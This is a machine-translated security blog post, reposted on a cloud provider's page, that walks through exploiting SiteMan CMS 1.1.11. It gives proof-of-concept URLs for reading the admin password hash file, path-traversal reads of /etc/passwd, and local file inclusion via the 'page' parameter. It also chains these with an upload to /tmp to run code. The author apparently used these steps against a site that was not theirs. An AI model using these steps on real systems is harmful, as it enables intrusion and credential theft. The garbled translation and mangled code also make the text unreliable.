SiteMan Cms vulnerability & amp; exploitation tips

Source: Internet
Author: User

Yesterday, I found a sub-station using siteman cms and the source code. I can see that SITEMAN CMS is a widely used program written in PHP, TXT is used as a database TXT. The security of the database is certainly high, but it is used by many people outside China. test environment: Linux + apache + php + mysql siteman 1.1.11 siteman cms remote password HASH read: http://XXX.COM//data/members.txt Use MD5 encryption and decryption to access the background http://www.bkjia.com /Admin. php can normally upload arbitrary files in the background http://xxx.com/admin.php?do=edfiles This server imposes directory restrictions on apache permissions. The file manager fails to generate files. When FTP is used to operate files, the Administrator finds an Arbitrary File Read vulnerability. http://XXX.com/admin.php?do=edtxt&file=../../../../../../../etc/passwd When I was helpless again, I found that the Code had something fun: Index. php 4th rows or so if (isset ($ _ GET ["page"]) {if (substr ($ _ GET ["page )! = ". ") {$ Page = $ _ GET [" page "];} else {$ page =" index ";}} else {$ page =" index ";} about 40th rows $ content = "pages /". $ page. ". php "; around 96th lines of include_once ($ content); I don't explain the local Inclusion Vulnerability you all know. This is easy to do. Since the website has no access to all the records, the TMP directory must have the permission.
Using ../upload files to any directory with Arbitrary File Read vulnerability to see if the upload is successful has been successfully uploaded and then burst chrysanthemum http://XXX.COM/index.php? Do = default & page = /.. /.. /.. /.. /.. /.. /.. /tmp/2 do not need to be included. php has around 40th lines $ content = "pages /". $ page. ". php "; summary: 1: Siteman administrator password hash read vulnerability POC: http://XXX.COM/data/members.txt 2: Arbitrary File Read vulnerability POC: http; // XXX. COM/admin. php? Do = edtxt & file = ../admin. php 3: Contains local vulnerability POC: http://XXX.COM/index.php? Do = default & page = XXX 4: When the upload fails, please do not forget to try the TMP temporary directory and reuse

 

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.